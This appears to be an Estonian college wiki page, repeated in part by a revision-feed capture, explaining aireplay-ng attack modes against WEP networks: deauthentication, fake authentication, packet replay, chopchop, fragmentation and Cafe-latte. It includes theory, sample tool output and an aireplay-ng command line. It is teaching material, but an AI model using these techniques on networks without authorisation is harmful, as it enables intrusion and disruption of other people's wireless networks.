Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi plaintekst väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada) et luu abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või rejectitakse. Iga saadetud pakk baseerub arvatava baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine broadcasti ilma autentimata. Soovitatav on võtta ka lühem pakett kuna deükrptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib target MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC&#039;i muutmiseks juhul kui seal on algselt multicast.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
\[\[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30933</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30933"/>
		<updated>2011-05-10T08:54:02Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Shared Key Authentication */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidi&#039;&#039;array&#039;&#039;(pusle).[6]&lt;br /&gt;
* Klient kasutab oma 64- vüi 128bitist salajast võtit ning krüptib saadud baidirea ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud array ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendab võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka APle pakke saata. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide dissimisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta broadcastis.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP cache tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentimist.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud VS broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud disconnect paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv on korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
15:49:32  Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nagu mainitud, broadcast disconnect on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga, kuna see ajab ruuteri segadusse(?). See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiamist autentida, seega saame kerge vaevaga ennast ära assotsida ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud ja võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.(?)&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA handshake paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud handshake&#039;id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK võttis hästituntud nõrga ICV[link] probleemi ja järeldas sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi plaintekst väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada) et luu abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või rejectitakse. Iga saadetud pakk baseerub arvatava baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine broadcasti ilma autentimata. Soovitatav on võtta ka lühem pakett kuna deükrptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.&lt;br /&gt;
